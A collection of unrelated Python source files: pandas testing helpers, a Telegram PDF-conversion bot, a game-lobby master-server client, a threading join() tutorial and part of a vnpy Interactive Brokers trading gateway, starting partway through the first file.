extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
# For testing, those properties return a generic callable, and not
# the actual class. In this case that is equivalent, but it is to
# ensure we don't rely on the property returning a class
# See https://github.com/pandas-dev/pandas/pull/46018 and
# https://github.com/pandas-dev/pandas/issues/32638 and linked issues
return lambda *args, **kwargs: SubclassedSeries(*args, **kwargs)
@property
def _constructor_expanddim(self):
return lambda *args, **kwargs: SubclassedDataFrame(*args, **kwargs)
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return lambda *args, **kwargs: SubclassedDataFrame(*args, **kwargs)
@property
def _constructor_sliced(self):
return lambda *args, **kwargs: SubclassedSeries(*args, **kwargs)
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
# -----------------------------------------------------------------------------
def shares_memory(left, right) -> bool:
"""
Pandas-compat for np.shares_memory.
"""
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
return np.shares_memory(left, right)
elif isinstance(left, np.ndarray):
# Call with reversed args to get to unpacking logic below.
return shares_memory(right, left)
if isinstance(left, RangeIndex):
return False
if isinstance(left, MultiIndex):
return shares_memory(left._codes, right)
if isinstance(left, (Index, Series)):
return shares_memory(left._values, right)
if isinstance(left, NDArrayBackedExtensionArray):
return shares_memory(left._ndarray, right)
if isinstance(left, pd.core.arrays.SparseArray):
return shares_memory(left.sp_values, right)
if isinstance(left, pd.core.arrays.IntervalArray):
return shares_memory(left._left, right) or shares_memory(left._right, right)
if isinstance(left, ExtensionArray) and left.dtype == "string[pyarrow]":
# https://github.com/pandas-dev/pandas/pull/43930#discussion_r736862669
if isinstance(right, ExtensionArray) and right.dtype == "string[pyarrow]":
# error: "ExtensionArray" has no attribute "_data"
left_pa_data = left._data # type: ignore[attr-defined]
# error: "ExtensionArray" has no attribute "_data"
right_pa_data = right._data # type: ignore[attr-defined]
left_buf1 = left_pa_data.chunk(0).buffers()[1]
right_buf1 = right_pa_data.chunk(0).buffers()[1]
return left_buf1 == right_buf1
if isinstance(left, BaseMaskedArray) and isinstance(right, BaseMaskedArray):
# By convention, we'll say these share memory if they share *either*
# the _data or the _mask
return np.shares_memory(left._data, right._data) or np.shares_memory(
left._mask, right._mask
)
if isinstance(left, DataFrame) and len(left._mgr.arrays) == 1:
arr = left._mgr.arrays[0]
return shares_memory(arr, right)
raise NotImplementedError(type(left), type(right))
|
bot.py
|
import datetime as dt
import logging
import os
import sys
from threading import Thread
from dotenv import load_dotenv
from logbook import Logger, StreamHandler
from logbook.compat import redirect_logging
from telegram import (
ForceReply,
InlineKeyboardButton,
InlineKeyboardMarkup,
MessageEntity,
ParseMode,
Update,
)
from telegram.chataction import ChatAction
from telegram.ext import (
CallbackContext,
CallbackQueryHandler,
CommandHandler,
Filters,
MessageHandler,
PreCheckoutQueryHandler,
Updater,
)
from telegram.error import Unauthorized
from telegram.ext import messagequeue as mq
from telegram.utils.request import Request
from pdf_bot import *
load_dotenv()
APP_URL = os.environ.get("APP_URL")
PORT = int(os.environ.get("PORT", "8443"))
TELE_TOKEN = os.environ.get("TELE_TOKEN_BETA", os.environ.get("TELE_TOKEN"))
DEV_TELE_ID = int(os.environ.get("DEV_TELE_ID"))
TIMEOUT = 20
CALLBACK_DATA = "callback_data"
def main():
# Setup logging
logging.getLogger("pdfminer").setLevel(logging.WARNING)
logging.getLogger("ocrmypdf").setLevel(logging.WARNING)
redirect_logging()
format_string = "{record.level_name}: {record.message}"
StreamHandler(
sys.stdout, format_string=format_string, level="INFO"
).push_application()
log = Logger()
q = mq.MessageQueue(all_burst_limit=3, all_time_limit_ms=3000)
request = Request(con_pool_size=8)
pdf_bot = MQBot(TELE_TOKEN, request=request, mqueue=q)
# Create the EventHandler and pass it your bot's token.
updater = Updater(
bot=pdf_bot,
use_context=True,
request_kwargs={"connect_timeout": TIMEOUT, "read_timeout": TIMEOUT},
)
def stop_and_restart():
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(_):
Thread(target=stop_and_restart).start()
job_queue = updater.job_queue
job_queue.run_repeating(restart, interval=dt.timedelta(minutes=30))
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
# General commands handlers
dispatcher.add_handler(CommandHandler("start", start_msg, run_async=True))
dispatcher.add_handler(CommandHandler("help", help_msg, run_async=True))
dispatcher.add_handler(CommandHandler("setlang", send_lang, run_async=True))
dispatcher.add_handler(
CommandHandler("support", send_support_options, run_async=True)
)
dispatcher.add_handler(CommandHandler("send", send_msg, Filters.user(DEV_TELE_ID)))
dispatcher.add_handler(
CommandHandler("stats", get_stats, Filters.user(DEV_TELE_ID))
)
# Callback query handler
dispatcher.add_handler(CallbackQueryHandler(process_callback_query, run_async=True))
# Payment handlers
dispatcher.add_handler(PreCheckoutQueryHandler(precheckout_check, run_async=True))
dispatcher.add_handler(
MessageHandler(Filters.successful_payment, successful_payment, run_async=True)
)
# URL handler
dispatcher.add_handler(
MessageHandler(Filters.entity(MessageEntity.URL), url_to_pdf, run_async=True)
)
# PDF commands handlers
dispatcher.add_handler(compare_cov_handler())
dispatcher.add_handler(merge_cov_handler())
dispatcher.add_handler(photo_cov_handler())
dispatcher.add_handler(text_cov_handler())
dispatcher.add_handler(watermark_cov_handler())
# PDF file handler
dispatcher.add_handler(file_cov_handler())
# Feedback handler
dispatcher.add_handler(feedback_cov_handler())
# Log all errors
dispatcher.add_error_handler(error_callback)
# Start the Bot
if APP_URL is not None:
updater.start_webhook(
listen="0.0.0.0",
port=PORT,
url_path=TELE_TOKEN,
webhook_url=APP_URL + TELE_TOKEN,
)
log.notice("Bot started webhook")
else:
updater.start_polling()
log.notice("Bot started polling")
# Run the bot until the you presses Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
def start_msg(update: Update, context: CallbackContext) -> None:
update.effective_message.chat.send_action(ChatAction.TYPING)
# Create the user entity in Datastore
create_user(update.effective_message.from_user)
_ = set_lang(update, context)
update.effective_message.reply_text(
_(
"Welcome to PDF Bot!\n\n<b>Key features:</b>\n"
"- Compress, merge, preview, rename, split and add watermark to PDF files\n"
"- Create PDF files from text messages\n"
"- Extract images and text from PDF files\n"
"- Convert PDF files into images\n"
"- Convert webpages and images into PDF files\n"
"- Beautify handwritten notes images into PDF files\n"
"- <b><i>And more...</i></b>\n\n"
"Type /help to see how to use PDF Bot"
),
parse_mode=ParseMode.HTML,
)
def help_msg(update, context):
update.effective_message.chat.send_action(ChatAction.TYPING)
_ = set_lang(update, context)
keyboard = [
[InlineKeyboardButton(_("Set Language ๐"), callback_data=SET_LANG)],
[
InlineKeyboardButton(_("Join Channel"), f"https://t.me/{CHANNEL_NAME}"),
InlineKeyboardButton(_("Support PDF Bot"), callback_data=PAYMENT),
],
]
reply_markup = InlineKeyboardMarkup(keyboard)
update.effective_message.reply_text(
_(
"You can perform most of the tasks by sending me one of the followings:\n"
"- PDF files\n- Photos\n- Webpage links\n\n"
"The rest of the tasks can be performed by using the commands below:\n"
"/compare - compare PDF files\n"
"/merge - merge PDF files\n"
"/photo - convert and combine multiple photos into PDF files\n"
"/text - create PDF files from text messages\n"
"/watermark - add watermark to PDF files"
),
reply_markup=reply_markup,
)
def process_callback_query(update: Update, context: CallbackContext):
_ = set_lang(update, context)
query = update.callback_query
data = query.data
if CALLBACK_DATA not in context.user_data:
context.user_data[CALLBACK_DATA] = set()
if data not in context.user_data[CALLBACK_DATA]:
context.user_data[CALLBACK_DATA].add(data)
if data == SET_LANG:
send_lang(update, context, query)
elif data in LANGUAGES:
store_lang(update, context, query)
if data == PAYMENT:
send_support_options(update, context, query)
elif data in [THANKS, COFFEE, BEER, MEAL]:
send_payment_invoice(update, context, query)
context.user_data[CALLBACK_DATA].remove(data)
query.answer()
def send_msg(update: Update, context: CallbackContext):
tele_id = int(context.args[0])
message = " ".join(context.args[1:])
try:
context.bot.send_message(tele_id, message)
update.effective_message.reply_text("Message sent")
except Exception as e:
log = Logger()
log.error(e)
update.effective_message.reply_text("Failed to send message")
def error_callback(update: Update, context: CallbackContext):
if context.error is not Unauthorized:
log = Logger()
log.error(f'Update "{update}" caused error "{context.error}"')
if __name__ == "__main__":
main()
|
pewmaster.py
|
#!/usr/bin/env/python
# -*- coding: utf-8 -*-
import urllib.request
import urllib.parse
from threading import Thread
import time
import base64
import json
def sanitize(url):
return base64.b64encode(urllib.parse.quote(url).encode("utf-8")).decode()
def desanitize(url):
return urllib.parse.unquote(base64.b64decode(url).decode("utf-8"))
def querylize(_dict: dict):
query = ""
for key, value in _dict.items():
query += "&{}={}".format(key, sanitize(value))
return query
class Lobby:
PEWMASTER_QUERY = "http://www.pixelsiege.net/master/query.php?game="
PEWMASTER_UPDATE = "http://www.pixelsiege.net/master/update.php?action="
@staticmethod
def list(game):
lobbies = []
url = "{}{}".format(Lobby.PEWMASTER_QUERY, sanitize(game))
status = 404
try:
response = urllib.request.urlopen(url)
status = respons.status
if status == 200:
raw_lobbies = response.read().decode("utf-8").splitlines()[1:]
for raw_lobby in raw_lobbies:
lobby = Lobby.parse(game, raw_lobby)
lobbies.append(lobby)
except:
pass
return (lobbies, status)
@staticmethod
def parse(game, raw_data):
data = raw_data.split('|')
hostname, private_ip, public_ip, info = [""] * 4
try:
hostname, private_ip, public_ip, info = desanitize(
data[0]), desanitize(data[1]), data[2], desanitize(data[3])
info = json.loads(base64.b64decode(info).decode("utf-8"))
except:
hostname, private_ip, public_ip = desanitize(
data[0]), desanitize(data[1]), data[2]
return Lobby(game, hostname, private_ip, public_ip, info, isData=True)
def __init__(self, game, hostname, private_ip=None, public_ip=None, info=None, isData=False):
self.game = game
self.hostname = hostname
self.private_ip = private_ip if private_ip else "127.0.0.1"
self.public_ip = public_ip
self.id = None
if not public_ip:
ip_request = urllib.request.urlopen('http://ip.42.pl/raw')
if ip_request.status == 200:
self.public_ip = ip_request.read().decode("utf-8")
self.info = info
self.__created = False
if not isData:
self.__created = True
self.__update_thread = Thread(target=self.__update)
self.__update_thread.daemon = True
query = {"game": self.game, "hostname": self.hostname}
if self.private_ip:
query["ip"] = self.private_ip
if self.info:
dump = json.dumps(self.info, indent=None,
ensure_ascii=False, separators=(',', ':'))
query["info"] = base64.b64encode(dump.encode("utf-8"))
queryString = querylize(query)
url = self.PEWMASTER_UPDATE + "create&" + queryString
response = urllib.request.urlopen(url)
self.id = int(response.read().decode("utf-8"))
self.__update_thread.start()
def close(self):
if not self.__created:
return
self.__update_thread.join(0)
url = self.PEWMASTER_UPDATE + "close&id=" + str(self.id)
urllib.request.urlopen(url)
self.__created = False
def update(self, hostname=None, info=None):
if not self.__created:
return
query = {}
if hostname:
query["hostname"] = hostname
self.hostname = hostname
if info:
query["info"] = info
self.info = info
queryString = querylize(query)
url = self.PEWMASTER_UPDATE + "update&id=" + str(self.id) + queryString
urllib.request.urlopen(url)
def __update(self):
while True:
time.sleep(60)
url = self.PEWMASTER_UPDATE + "update&id=" + str(self.id)
urllib.request.urlopen(url)
def __repr__(self):
return "{} - {}({}) {}".format(self.game, self.hostname, self.public_ip, self.info)
if __name__ == "__main__":
name = "111" + str(time.time())
info_data = [1, 2, 3, {'k': True, 'n': False, "ร": "รฉรจ&รฎ@อฟฮ"}]
lobby = Lobby(name, "lobby_test", info=info_data)
print(lobby)
print(Lobby.list(name))
time.sleep(5)
lobby.update(hostname="UpdatedLobby")
print(lobby)
print(Lobby.list(name))
lobby.close()
|
03-threading_join.py
|
#!/usr/bin/env python3
# As per the previous example, the thread started as `daemon`
# will not block the other threads as well as the main program.
# Hence, the main program and other threads will not wait for the
# daemon thread to exit, before exiting themselves. This may not
# be always good, depending on the requirements.
# The `threading` module thus provides a method named `join()`
# which blocks the calling thread and the main program, which makes them
# to wait till the thread calling the `join()` method terminates, either
# normally or through any sort of exception, or perhaps a timeout.
# This example demonstrates how to join daemon threads so that
# a premature exit of other threads won't end the daemon thread as well.
# ie.. `join()` makes the other threads wait until the thread calling `join()`
# exists.
import threading
import logging
import time
def my_daemon():
logging.debug("Starting the `my_daemon` thread")
time.sleep(10)
logging.debug("Exiting the `my_daemon` thread")
def norm_thread():
logging.debug("Starting the `normal` thread")
# We are not setting a sleep here since we want to
# make sure that this function exits earlier than
# the `my_daemon()` function.
# But since `my_daemon()` is going to be called
# with `join()`, the calling thread has to wait
# until `my_daemon()` finishes.
logging.debug("Exiting the `normal` thread")
logging.basicConfig(level=logging.DEBUG, format="%(threadName)-1s: %(message)s")
daemon_thread = threading.Thread(name="daemon_thread", target=my_daemon, daemon=True)
normal_thread = threading.Thread(name="normal_thread", target=norm_thread)
daemon_thread.start()
normal_thread.start()
daemon_thread.join()
normal_thread.join()
|
ib_gateway.py
|
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
SI-202006-1000-USD-FUT NYMEX
ES-2020006-C-2430-50-USD-FOP GLOBEX
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from typing import Optional
import shelve
from tzlocal import get_localzone
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA",
Exchange.EDGEA: "EDGEA",
Exchange.ISLAND: "ISLAND",
Exchange.BATS: "BATS",
Exchange.IEX: "IEX",
Exchange.IBKRATS: "IBKRATS",
Exchange.OTC: "PINK"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_IB2VT = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOT": Product.OPTION
}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
JOIN_SYMBOL = "-"
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWSๅฐๅ": "127.0.0.1",
"TWS็ซฏๅฃ": 7497,
"ๅฎขๆทๅท": 1,
"ไบคๆ่ดฆๆท": ""
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super().__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWSๅฐๅ"]
port = setting["TWS็ซฏๅฃ"]
clientid = setting["ๅฎขๆทๅท"]
account = setting["ไบคๆ่ดฆๆท"]
self.api.connect(host, port, clientid, account)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
data_filename = "ib_contract_data.db"
data_filepath = str(get_file_path(data_filename))
local_tz = get_localzone()
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.account = ""
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.subscribed = set()
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS่ฟๆฅๆๅ")
self.load_contract_data()
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS่ฟๆฅๆญๅผ")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super().currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"ๆๅกๅจๆถ้ด: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super().error(reqId, errorCode, errorString)
msg = f"ไฟกๆฏ้็ฅ๏ผไปฃ็ ๏ผ{errorCode}๏ผๅ
ๅฎน: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick = self.ticks[reqId]
dt = datetime.fromtimestamp(int(value))
tick.datetime = self.local_tz.localize(dt)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
if not order:
return
order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=generate_symbol(ib_contract),
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, Exchange.SMART),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"ๅญๅจไธๆฏๆ็ไบคๆๆๆไป{generate_symbol(contract)} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
try:
ib_size = int(contract.multiplier)
except ValueError:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super().contractDetails(reqId, contractDetails)
# Generate symbol from ib contract details
ib_contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol = generate_symbol(ib_contract)
# Generate contract
contract = ContractData(
symbol=symbol,
exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=ib_contract.multiplier,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super().execDetails(reqId, contract, execution)
dt = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt = self.local_tz.localize(dt)
trade = TradeData(
symbol=generate_symbol(contract),
exchange=EXCHANGE_IB2VT.get(contract.exchange, Exchange.SMART),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str):
"""
Callback of all sub accountid.
"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"ๅฝๅไฝฟ็จ็ไบคๆ่ดฆๅทไธบ{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
dt = self.local_tz.localize(dt)
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread.start()
